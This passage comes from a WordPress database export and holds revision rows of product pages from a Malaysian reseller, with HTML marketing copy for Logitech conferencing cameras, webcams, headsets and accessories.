https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A LEAP FORWARD IN OPTICS AND PERFORMANCE</h2><p>Logitech PTZ Pro 2 delivers premium optics and life-like video to create the experience of sitting together in the same room, even if you are a thousand kilometers away. Technical improvements accent the cameraâ€™s brilliantly sharp image resolution, outstanding colour reproduction, and exceptional optical accuracy. At half the price of comparable models, PTZ Pro 2 is clearly the smart choice.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/JEoMD9m4K1k<h3>CAPTURE THE ACTION IN HIGH-DEF</h3><p>PTZ Pro 2 is the perfect fit for classrooms, auditoriums, and large meeting rooms. Capture a wide shot with a 90Â° field of view, or focus on presenters, panelists, and whiteboards with flexible pan and tilt controls. A 10x zoom lens with autofocus perfectly frames speakers and their visual aids, and delivers outstanding detail and clarity to remote participants and recording systems.</p><h3>EASY TO SET UP AND USE</h3><p>USB plug-and-play connectivity makes PTZ Pro 2 a breeze to deploy and use. Simply connect PTZ Pro 2 to the conference room computer or your laptop through USB, and youâ€™re good to go. Designed for compatibility with video conferencing applications on WindowsÂ® and MacÂ® computers, PTZ Pro 2 complements any audio system or speakerphone.</p>		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"af7a3b3\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"af7a3b3\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"a3ffca9\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"a3ffca9\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n		<h3>OPERATE NEARBY OR FAR AWAY</h3><p>Pan, tilt, and zoom with the hand-held remote to see everything in your conference room, auditorium, classroom, or workspace. The camera can also be operated from a remote location with downloadable software.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PREMIUM CAMERA LENS</h4><p>PTZ Pro 2 features a premium camera lens, designed and manufactured by Logitech. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in.</p><h4>MULTIPLE MOUNTING OPTIONS</h4><p>Configure the conference rooms or event space any way you want: PTZ Pro 2 includes mounting hardware for both tabletop and wall mounting, and features a standard tripod thread for additional flexibility.</p><h4>PRESET AND FORGET</h4><p>Compose a wide shot so that everyone is in view. Smoothly switch between people and whiteboards. Perfectly frame each panelist for a broadcast-like experience. PTZ Pro 2 features three camera presets that save pan, tilt, and zoom settings, and smoothly transitions between them at the touch of a button.</p><h4>CERTIFIED FOR BUSINESS</h4><p>PTZ Pro 2 offers a plug-and-play USB connection to conference room computers. The camera is certified for Skype for Business, is Cisco WebEx compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with PTZ Pro 2.</p>','Logitech PTZ PRO 2','','inherit','closed','closed','','2954-revision-v1','','','2019-03-04 14:19:05','2019-03-04 06:19:05','',2954,'https://bintara.com.my/blog/2019/03/04/2954-revision-v1/',0,'revision','',0),(2966,1,'2019-03-04 14:20:08','2019-03-04 06:20:08','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-meetup/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-connect/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-ptz-pro-2/\" role=\"button\">\n						View\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-03-04 14:20:08','2019-03-04 06:20:08','',16,'https://bintara.com.my/blog/2019/03/04/16-revision-v1/',0,'revision','',0),(2968,1,'2019-03-04 14:23:58','2019-03-04 06:23:58','<h2>PTZ PRO 2</h2><p>HD 1080p video camera with enhanced pan/tilt and zoom</p><ul><li>See every detail with HD video and 10x zoom</li><li>Works with your meeting and video conferencing applications</li><li>Use with your existing audio system or speakerphone</li></ul>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A LEAP FORWARD IN OPTICS AND PERFORMANCE</h2><p>Logitech PTZ Pro 2 delivers premium optics and life-like video to create the experience of sitting together in the same room, even if you are a thousand kilometers away. Technical improvements accent the cameraâ€™s brilliantly sharp image resolution, outstanding colour reproduction, and exceptional optical accuracy. At half the price of comparable models, PTZ Pro 2 is clearly the smart choice.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/JEoMD9m4K1k<h3>CAPTURE THE ACTION IN HIGH-DEF</h3><p>PTZ Pro 2 is the perfect fit for classrooms, auditoriums, and large meeting rooms. Capture a wide shot with a 90Â° field of view, or focus on presenters, panelists, and whiteboards with flexible pan and tilt controls. A 10x zoom lens with autofocus perfectly frames speakers and their visual aids, and delivers outstanding detail and clarity to remote participants and recording systems.</p><h3>EASY TO SET UP AND USE</h3><p>USB plug-and-play connectivity makes PTZ Pro 2 a breeze to deploy and use. Simply connect PTZ Pro 2 to the conference room computer or your laptop through USB, and youâ€™re good to go. Designed for compatibility with video conferencing applications on WindowsÂ® and MacÂ® computers, PTZ Pro 2 complements any audio system or speakerphone.</p>		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"af7a3b3\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"af7a3b3\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"a3ffca9\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"a3ffca9\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n		<h3>OPERATE NEARBY OR FAR AWAY</h3><p>Pan, tilt, and zoom with the hand-held remote to see everything in your conference room, auditorium, classroom, or workspace. The camera can also be operated from a remote location with downloadable software.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PREMIUM CAMERA LENS</h4><p>PTZ Pro 2 features a premium camera lens, designed and manufactured by Logitech. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in.</p><h4>MULTIPLE MOUNTING OPTIONS</h4><p>Configure the conference rooms or event space any way you want: PTZ Pro 2 includes mounting hardware for both tabletop and wall mounting, and features a standard tripod thread for additional flexibility.</p><h4>PRESET AND FORGET</h4><p>Compose a wide shot so that everyone is in view. Smoothly switch between people and whiteboards. Perfectly frame each panelist for a broadcast-like experience. PTZ Pro 2 features three camera presets that save pan, tilt, and zoom settings, and smoothly transitions between them at the touch of a button.</p><h4>CERTIFIED FOR BUSINESS</h4><p>PTZ Pro 2 offers a plug-and-play USB connection to conference room computers. The camera is certified for Skype for Business, is Cisco WebEx compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with PTZ Pro 2.</p><p>[maxbutton id=\"3\"]</p>','Logitech PTZ PRO 2','','inherit','closed','closed','','2954-revision-v1','','','2019-03-04 14:23:58','2019-03-04 06:23:58','',2954,'https://bintara.com.my/blog/2019/03/04/2954-revision-v1/',0,'revision','',0),(2969,1,'2019-03-04 14:24:46','2019-03-04 06:24:46','<h2>MEETUP</h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms</p><ul><li>See everyone, even those close to the camera</li><li>RightSenseâ„¢ Technologies with automatic framing</li><li>Compact design minimizes cabling and clutter</li></ul>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>PERFECT FOR SMALL ROOMS</h2><p>MeetUp is Logitechâ€™s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsightâ„¢ auto framing plus a pan/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.</p>https://youtu.be/tD_tmRMN2OA<h3>A WIDE VIEW FOR TIGHT SPACES</h3><p>LogitechÂ® MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.</p><h3>HEARING IS BELIEVING</h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUpâ€™s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		https://youtu.be/CqeUIzYth_w<h3>AS EASY AS PLUG AND PLAY</h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.</p><h3>DESIGNED FOR THE WAY PEOPLE MEET</h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.</p>https://youtu.be/4xwIpyv3KOs		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"7f589de\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a 